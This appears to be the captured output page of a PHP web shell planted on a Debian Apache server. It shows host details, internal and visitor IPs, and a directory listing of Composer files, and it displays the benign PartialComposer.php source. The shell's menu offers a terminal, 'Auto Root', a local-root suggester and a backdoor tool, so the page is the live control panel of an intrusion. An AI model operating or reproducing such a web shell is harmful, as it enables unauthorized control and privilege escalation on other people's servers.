Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
php /
Composer /
Delete
Unzip
Name
Size
Permission
Date
Action
Advisory
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Autoload
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
CaBundle
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
ClassMapGenerator
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Command
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Config
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Console
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
DependencyResolver
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Downloader
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
EventDispatcher
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Exception
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Filter
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
IO
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Installer
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Json
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
MetadataMinifier
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
PHPStan
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Package
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Pcre
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Platform
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Plugin
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Question
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Repository
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Script
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
SelfUpdate
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Semver
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Spdx
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Util
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
XdebugHandler
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Cache.php
11.05
KB
-rw-r--r--
2023-03-21 10:50
Composer.php
4.14
KB
-rw-r--r--
2023-03-21 10:50
Config.php
22.88
KB
-rw-r--r--
2023-03-21 10:50
Factory.php
31.11
KB
-rw-r--r--
2026-05-14 09:28
InstalledVersions.php
15.76
KB
-rw-r--r--
2023-03-21 10:50
Installer.php
53.36
KB
-rw-r--r--
2023-03-21 10:50
PartialComposer.php
2.3
KB
-rw-r--r--
2023-03-21 10:50
autoload.php
26.88
KB
-rw-r--r--
2026-05-14 09:28
Save
Rename
<?php declare(strict_types=1); /* * This file is part of Composer. * * (c) Nils Adermann <naderman@naderman.de> * Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Composer; use Composer\Package\RootPackageInterface; use Composer\Util\Loop; use Composer\Repository\RepositoryManager; use Composer\Installer\InstallationManager; use Composer\EventDispatcher\EventDispatcher; /** * @author Jordi Boggiano <j.boggiano@seld.be> */ class PartialComposer { /** * @var RootPackageInterface */ private $package; /** * @var Loop */ private $loop; /** * @var Repository\RepositoryManager */ private $repositoryManager; /** * @var Installer\InstallationManager */ private $installationManager; /** * @var Config */ private $config; /** * @var EventDispatcher */ private $eventDispatcher; public function setPackage(RootPackageInterface $package): void { $this->package = $package; } public function getPackage(): RootPackageInterface { return $this->package; } public function setConfig(Config $config): void { $this->config = $config; } public function getConfig(): Config { return $this->config; } public function setLoop(Loop $loop): void { $this->loop = $loop; } public function getLoop(): Loop { return $this->loop; } public function setRepositoryManager(RepositoryManager $manager): void { $this->repositoryManager = $manager; } public function getRepositoryManager(): RepositoryManager { return $this->repositoryManager; } public function setInstallationManager(InstallationManager $manager): void { $this->installationManager = $manager; } public function getInstallationManager(): InstallationManager { return $this->installationManager; } public function setEventDispatcher(EventDispatcher $eventDispatcher): void { $this->eventDispatcher = $eventDispatcher; } public function getEventDispatcher(): EventDispatcher { return $this->eventDispatcher; } }